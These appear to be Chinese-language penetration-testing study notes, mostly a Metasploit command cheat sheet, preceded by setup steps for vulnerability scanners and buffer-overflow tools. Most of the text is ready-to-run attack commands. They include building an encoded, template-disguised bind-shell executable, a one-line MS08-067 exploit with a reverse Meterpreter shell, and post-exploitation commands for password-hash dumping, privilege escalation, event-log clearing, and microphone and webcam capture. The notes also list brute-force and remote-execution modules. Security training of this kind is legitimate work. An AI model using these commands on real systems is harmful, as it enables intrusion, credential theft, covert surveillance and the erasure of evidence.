漏洞掃描
- 查看漏洞命令:searchsploit tomcat (右邊是漏洞使用說明書的路徑)
- 安裝openvas漏洞掃描:
下載安裝包:apt-get install openvas
安裝:openvas-setup
- 安裝nessus:
http://www.tenable.com/products/nessus/select-your-operating-system
• 安裝:dpkg –i
• 安裝路徑:/opt/nessus
• 啓動服務 • /etc/init.d/nessusd start
• 管理地址 • https://127.0.0.1:8834
• 註冊激活碼 • http://www.tenable.com/products/nessus-home
- 安裝:NEXPOSE(收費很貴,一年幾十萬)
WINDOWS 緩衝區溢出
- FUZZER(只針對xp、windowns2003低版本有用)
- • SLMail 5.5.0 Mail Server
- • ImmunityDebugger_1_85_setup.exe
- • mona.py
Shellcode攻擊: shellcode是16進制的機器碼, 可在暫存器eip溢出後,塞入一段可讓CPU執行的shellcode機器碼,讓其打開nc傳輸鏈接。利用軟件漏洞獲得特定的shellcode,再經由C或Python編寫遠程攻擊程序,進而取得對方電腦的root權限
MSF工具:
- 啓動: msfconsole –q ,msfdb start,db_status,db_connect –h /usr/share/metasploit-framework/modules/
- 基本使用方法:
- db_nmap 192.168.0.115,hosts,hosts 192.168.0.115
- db_disconnet / db_connect
- db_import /root/nmap.xml
- db_export -f xml /root/bak.xml
- 使用mysql_login模塊:
- 進入模塊: 1. Search mysql_login, 2.use auxilibary/scanner/mysql/mysql_login, 3. show options
- 使用模塊: 1. Set USERNAME root , 2.set BLANK_PASSWORDS yes, 3. set RHOSTS 192.168.1.22, 4. show options, 5. Run 6.db_export –f xml /root/ msfbak.xml 7. Back
- 例如:
- 控制檯命令:
- set / unset / setg / unsetg / save
- Run / exploit
- jobs / kill 0
- load / unload /loadpath
- session -l / -iҁShell ̵Meterpreter session̵VNC
- route指定session路由流量
- irb (Framework::Version)
- Resource (msfconsol -r a.rc)
- 生成Payload:
- 1. use payload/windows/shell_bind_tcp
- generate/ generate -b '\x00' (二進制編碼,-b過濾壞字符)
- 生成payload: generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/ share/windows-binaries/radmin.exe -f /root/1.exe
- Meterpreter:反彈的shell控制
- 基本命令:Help̵、background、Run、bgrun、cd、ls、cat、pwd、dir、mkdir、mv、rm、rmdir、edit、lpwd、lcd、clearev、download -——upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 ——execute -f cmd.exe -i –H getduid、getsystem、getprivs、getproxy、getpid、Hashdump、run post/windows/gather/hashdump、sysinfo、ps、kill、migrate、reboot、shutdown、shell、show_mount、search -f autoexec.bat、arp、netstat、ipconfig、ifconfig、route、Idletime、resource、record_mic、webcam_list、webcam_snap -i 1 -v false
- Msfcli——2015年6月已經取消的框架:由命令msfconsole –x命令取代
- ▪ msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/ reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit"
- Auxiliary掃描模塊
- search arp,use auxiliary/scanner/discovery/arp_sweep
- search portscan,use auxiliary/scanner/portscan/syn
- search udp_sweep/udp_probe ,use auxiliary/scanner/discovery/udp_sweep
- use auxiliary/scanner/ssh/ssh_version
- use auxiliary/scanner/ssh/ssh_login set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/ root_userpass.txt Ҕset VERBOSE false ;run(密碼爆破)
- use auxiliary/scanner/ssh/juniper_backdoor (設備後門)
- use auxiliary/scanner/ssh/ssh_login_pubkey set KEY_FILE id_rsa ; set USERNAME root ;run(公鑰登錄)
- use auxiliary/scanner/mssql/mssql_ping(鏈接mssql)
- use auxiliary/scanner/mssql/mssql_login(爆破mssql)
- use auxiliary/admin/mssql/mssql_exec(遠程執行)
- use auxiliary/scanner/vnc/vnc_login(密碼破解)
- use auxiliary/scanner/vnc/vnc_none_auth,supported : None, free access!
- use auxiliary/scanner/rdp/ms12_020_check 遠程桌面漏洞
- use auxiliary/scanner/smb/smb_version
- use auxiliary/scanner/smb/pipe_auditor
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
- use auxiliary/scanner/smb/smb_enumshares
- use auxiliary/scanner/smb/smb_enumusers
- use auxiliary/scanner/smb/smb_lookupsid